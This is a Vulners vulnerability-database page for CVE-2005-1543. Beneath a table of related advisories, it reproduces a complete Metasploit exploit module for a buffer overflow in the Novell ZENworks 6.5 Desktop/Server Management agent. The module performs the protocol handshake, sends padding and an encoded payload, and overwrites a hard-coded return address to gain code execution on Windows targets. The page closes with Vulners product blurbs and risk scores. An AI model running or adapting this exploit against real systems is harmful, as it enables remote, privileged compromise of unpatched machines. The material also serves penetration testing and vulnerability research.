Vulners
Lucene search
Novell ZENworks 6.5 Desktop/Server Management Overflow
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2005-1543 | 25 Jul 201000:00 | – | circl |
 | Novell ZENworks Remote Management Buffer Overflow (CVE-2005-1543) | 25 Oct 200900:00 | – | checkpoint_advisories |
 | CVE-2005-1543 | 25 May 200504:00 | – | cve |
 | CVE-2005-1543 | 25 May 200504:00 | – | cvelist |
 | Novell ZENworks 6.5 - Desktop/Server Management Overflow (Metasploit) | 25 Jul 201000:00 | – | exploitdb |
 | Novell ZENworks 6.5 Desktop/Server Management Overflow | 21 Jan 200622:10 | – | metasploit |
 | CVE-2005-1543 | 25 May 200504:00 | – | nvd |
 | Novell ZENworks Remote Management authentication buffer overflow | 2 Mar 200600:00 | – | saint |
| Novell ZENworks Remote Management authentication buffer overflow | 2 Mar 200600:00 | – | saint |
| Novell ZENworks Remote Management authentication buffer overflow | 2 Mar 200600:00 | – | saint |
10
`##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Novell ZENworks 6.5 Desktop/Server Management Overflow',
'Description' => %q{
This module exploits a heap overflow in the Novell ZENworks
Desktop Management agent. This vulnerability was discovered
by Alex Wheeler.
},
'Author' => [ 'anonymous' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2005-1543'],
[ 'OSVDB', '16698'],
[ 'BID', '13678'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 32767,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[
'Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent',
{
'Platform' => 'win',
'Ret' => 0x10002e06,
},
],
],
'DisclosureDate' => 'May 19 2005',
'DefaultTarget' => 0))
end
def exploit
connect
hello = "\x00\x06\x05\x01\x10\xe6\x01\x00\x34\x5a\xf4\x77\x80\x95\xf8\x77"
print_status("Sending version identification")
sock.put(hello)
pad = Rex::Text.rand_text_alphanumeric(6, payload_badchars)
ident = sock.get_once
if !(ident and ident.length == 16)
print_status("Failed to receive agent version identification")
return
end
print_status("Received agent version identification")
print_status("Sending client acknowledgement")
sock.put("\x00\x01")
# Stack overflow in ZenRem32.exe / ZENworks Server Management
sock.put("\x00\x06#{pad}\x00\x06#{pad}\x7f\xff" + payload.encoded + "\x00\x01")
ack = sock.get_once
sock.put("\x00\x01")
sock.put("\x00\x02")
print_status("Sending final payload")
sock.put("\x00\x24" + ("A" * 0x20) + [ target.ret ].pack('V'))
print_status("Overflow request sent, sleeping for four seconds")
sleep(4)
handler
disconnect
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Nov 2009 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.80369